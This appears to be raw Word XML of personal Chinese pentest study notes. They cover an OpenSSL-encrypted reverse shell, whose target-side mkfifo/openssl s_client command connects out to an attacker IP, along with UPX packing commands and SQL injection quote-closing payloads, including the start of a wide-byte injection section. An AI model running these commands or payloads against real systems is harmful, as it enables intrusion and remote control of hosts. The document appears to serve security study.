    <w:p w14:paraId="6040F19F" w14:textId="77777777" w:rsidR="00AD1C79" w:rsidRPr="00AD1C79" w:rsidRDefault="00AD1C79" w:rsidP="00AD1C79">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD1C79">
        <w:t>目标机：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36823FB2" w14:textId="77777777" w:rsidR="00AD1C79" w:rsidRPr="00AD1C79" w:rsidRDefault="00AD1C79" w:rsidP="00AD1C79">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD1C79">
        <w:t>系统：</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t>Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD26ED3" w14:textId="77777777" w:rsidR="00AD1C79" w:rsidRPr="00AD1C79" w:rsidRDefault="00AD1C79" w:rsidP="00AD1C79">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="55"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD1C79">
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t>192.168.1.8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF2625A" w14:textId="77777777" w:rsidR="00AD1C79" w:rsidRPr="00AD1C79" w:rsidRDefault="00AD1C79" w:rsidP="00AD1C79">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD1C79">
        <w:t>攻击机：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B3FE66" w14:textId="77777777" w:rsidR="00AD1C79" w:rsidRPr="00AD1C79" w:rsidRDefault="00AD1C79" w:rsidP="00AD1C79">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD1C79">
        <w:t>系统：</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t>Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59335184" w14:textId="77777777" w:rsidR="00AD1C79" w:rsidRPr="00AD1C79" w:rsidRDefault="00AD1C79" w:rsidP="00AD1C79">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="56"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD1C79">
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t>47.xxx.xxx.72</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20CB1337" w14:textId="77777777" w:rsidR="00AD1C79" w:rsidRPr="00AD1C79" w:rsidRDefault="00AD1C79" w:rsidP="00AD1C79">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD1C79">
        <w:t>假设我们从目标机反弹</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t xml:space="preserve"> shell </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t>到攻击机</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t>。首先需要利用上一步生成的自签名证书，在攻击机上使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t xml:space="preserve"> OpenSSL </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t>监听一个端口，在这里使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t xml:space="preserve"> 2333 </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t>端口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29ACEBCA" w14:textId="77777777" w:rsidR="00AD1C79" w:rsidRPr="00AD1C79" w:rsidRDefault="00AD1C79" w:rsidP="00AD1C79">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD1C79">
        <w:t xml:space="preserve">openssl s_server </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t xml:space="preserve">quiet </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t>key key</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t xml:space="preserve">pem </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t>cert cert</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t xml:space="preserve">pem </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t xml:space="preserve">port </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2333</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6277B5B5" w14:textId="77777777" w:rsidR="00AD1C79" w:rsidRDefault="00AD1C79" w:rsidP="00AD1C79">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="779B4E6B" w14:textId="618C67D1" w:rsidR="00AD1C79" w:rsidRPr="00AD1C79" w:rsidRDefault="00AD1C79" w:rsidP="00AD1C79">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD1C79">
        <w:t>此时</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t xml:space="preserve"> OpenSSL </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t>便在攻击机的</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t xml:space="preserve"> 2333 </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t>端口上启动了一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t xml:space="preserve"> SSL/TLS server</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1C56C2" w14:textId="77777777" w:rsidR="00AD1C79" w:rsidRPr="00AD1C79" w:rsidRDefault="00AD1C79" w:rsidP="00AD1C79">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD1C79">
        <w:lastRenderedPageBreak/>
        <w:t>这时在目标机进行反弹</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t xml:space="preserve"> shell </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t>操作，命令为：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06391BEF" w14:textId="77777777" w:rsidR="00AD1C79" w:rsidRPr="00AD1C79" w:rsidRDefault="00AD1C79" w:rsidP="00AD1C79">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD1C79">
        <w:t>mkfifo /tmp/s</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t xml:space="preserve"> /bin/sh </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t xml:space="preserve">i </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t xml:space="preserve"> /tmp/s </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2&gt;&amp;1</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t xml:space="preserve"> openssl s_client </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t xml:space="preserve">quiet </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t xml:space="preserve">connect </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>47.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t>xxx</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t>xxx</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.72:2333</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t xml:space="preserve"> /tmp/s</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t xml:space="preserve"> rm /tmp/s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48154DAC" w14:textId="77777777" w:rsidR="00AD1C79" w:rsidRPr="00AD1C79" w:rsidRDefault="00AD1C79" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="458EA470" w14:textId="0DD3655E" w:rsidR="000202D6" w:rsidRDefault="00AD1C79" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如此攻击者使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>OpenSSL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>反弹了肉鸡的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4572659D" w14:textId="77777777" w:rsidR="000202D6" w:rsidRDefault="000202D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03F92B77" w14:textId="111C19EE" w:rsidR="000202D6" w:rsidRDefault="00D9016D" w:rsidP="00D9016D">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>加壳</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0812EA4F" w14:textId="77777777" w:rsidR="00D9016D" w:rsidRDefault="00D9016D" w:rsidP="00D9016D"/>
    <w:p w14:paraId="7D3A7351" w14:textId="3B2265E2" w:rsidR="00D9016D" w:rsidRDefault="00D9016D" w:rsidP="00D9016D">
      <w:r w:rsidRPr="00D9016D">
        <w:t>https://github.com/upx/upx/releases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7238F734" w14:textId="302B9CE3" w:rsidR="00D9016D" w:rsidRDefault="00D9016D" w:rsidP="00D9016D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>UPX</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通常可压缩</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>dll</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>体积</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>50%-70%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C67258D" w14:textId="77777777" w:rsidR="00D9016D" w:rsidRDefault="00D9016D" w:rsidP="00D9016D"/>
    <w:p w14:paraId="77F8C663" w14:textId="4F6F10AB" w:rsidR="00D9016D" w:rsidRDefault="00D9016D" w:rsidP="00D9016D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>UPX</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最小体积压缩：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F6AE93" w14:textId="77777777" w:rsidR="00D9016D" w:rsidRDefault="00D9016D" w:rsidP="00D9016D">
      <w:r w:rsidRPr="00D9016D">
        <w:t>upx --best program.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C8F885" w14:textId="25461D6E" w:rsidR="00D9016D" w:rsidRPr="00D9016D" w:rsidRDefault="00D9016D" w:rsidP="00D9016D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D9016D">
        <w:t>upx --brute program.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5CC190" w14:textId="77777777" w:rsidR="000202D6" w:rsidRDefault="000202D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="751F8074" w14:textId="77777777" w:rsidR="000202D6" w:rsidRDefault="000202D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="078E7EAC" w14:textId="77777777" w:rsidR="000202D6" w:rsidRDefault="000202D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F84354F" w14:textId="77777777" w:rsidR="000202D6" w:rsidRDefault="000202D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CE90979" w14:textId="77777777" w:rsidR="000202D6" w:rsidRDefault="000202D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79FC6435" w14:textId="77777777" w:rsidR="000202D6" w:rsidRDefault="000202D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="690C8F4C" w14:textId="77777777" w:rsidR="000202D6" w:rsidRDefault="000202D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E8901F3" w14:textId="77777777" w:rsidR="000202D6" w:rsidRDefault="000202D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DC8A8E3" w14:textId="77777777" w:rsidR="000202D6" w:rsidRDefault="000202D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3403B525" w14:textId="77777777" w:rsidR="000202D6" w:rsidRDefault="000202D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D297F02" w14:textId="77777777" w:rsidR="000202D6" w:rsidRDefault="000202D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="291A7BFF" w14:textId="77777777" w:rsidR="000202D6" w:rsidRDefault="000202D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24EB3555" w14:textId="77777777" w:rsidR="000202D6" w:rsidRDefault="000202D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E8663AE" w14:textId="5E908076" w:rsidR="00AE011D" w:rsidRDefault="00AE011D" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc159779465"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQLi</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="6EB6B325" w14:textId="77777777" w:rsidR="00AE011D" w:rsidRDefault="00AE011D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A42EB2A" w14:textId="48A13116" w:rsidR="00E42B81" w:rsidRDefault="00E42B81" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc159779466"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如何分析</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mysql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的报错</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="790185E6" w14:textId="02DC2296" w:rsidR="00E42B81" w:rsidRDefault="00E55746" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我传入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E55746">
        <w:t>?id=</w:t>
      </w:r>
      <w:r w:rsidRPr="00E55746">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>1'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3999DAA1" w14:textId="6F2249E9" w:rsidR="00E55746" w:rsidRDefault="00E55746" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如遇到报错</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D5BD509" w14:textId="14BFE3B5" w:rsidR="00E55746" w:rsidRPr="00E55746" w:rsidRDefault="00E55746" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00E55746">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'') LIMIT 0,1' at line 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35811B33" w14:textId="7DF4981D" w:rsidR="00E55746" w:rsidRDefault="00E55746" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先，报错部分语句，会被两个单引号包裹</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65EBC745" w14:textId="343F57FD" w:rsidR="00E55746" w:rsidRDefault="00E55746" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>所以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E55746">
        <w:t>'1'') LIMIT 0,1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是拼入我传参的内容，抛却我传入的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366BE9F8" w14:textId="54D03926" w:rsidR="00E55746" w:rsidRDefault="00E55746" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>可知原本是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">'') limit 0,1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，遂认定</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1')--+ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来闭合单引号</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A106ED" w14:textId="77777777" w:rsidR="00E42B81" w:rsidRDefault="00E42B81" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2232F5F5" w14:textId="77777777" w:rsidR="00E42B81" w:rsidRDefault="00E42B81" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19B45130" w14:textId="77777777" w:rsidR="00E42B81" w:rsidRDefault="00E42B81" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="264E4564" w14:textId="77777777" w:rsidR="00E42B81" w:rsidRDefault="00E42B81" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24168547" w14:textId="7E2E06BC" w:rsidR="00E42B81" w:rsidRDefault="00E42B81" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc159779467"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我的常见误区</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="66B13D12" w14:textId="7230390F" w:rsidR="00302AC1" w:rsidRDefault="00302AC1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00C808E9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>双引号</w:t>
      </w:r>
      <w:r w:rsidRPr="00C808E9">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>””</w:t>
      </w:r>
      <w:r w:rsidRPr="00C808E9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>对字符串</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的值进行包裹。在一些</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IDE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上，使用双引号不会高亮处理，但是单引号也可以。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD0FCE5" w14:textId="77777777" w:rsidR="00AE011D" w:rsidRDefault="00AE011D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43FA0F4E" w14:textId="13BC8DC7" w:rsidR="000835DA" w:rsidRDefault="000835DA" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc159779468"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>宽字节注入</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="7748394D" w14:textId="6C60C26B" w:rsidR="000835DA" w:rsidRDefault="000835DA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>程序对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>黑客传入的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行转义处理，变为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>\'</w:t>
      </w:r>
    </w:p>
